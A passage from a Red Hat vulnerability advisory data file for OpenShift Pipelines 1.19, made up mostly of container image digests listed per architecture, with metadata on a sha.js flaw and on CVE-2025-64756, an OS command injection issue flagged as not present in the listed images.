"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sha.js: Missing type checks leading to hash rewind and passing on crafted data"
},
{
"cve": "CVE-2025-64756",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2025-11-17T18:01:28.077927+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
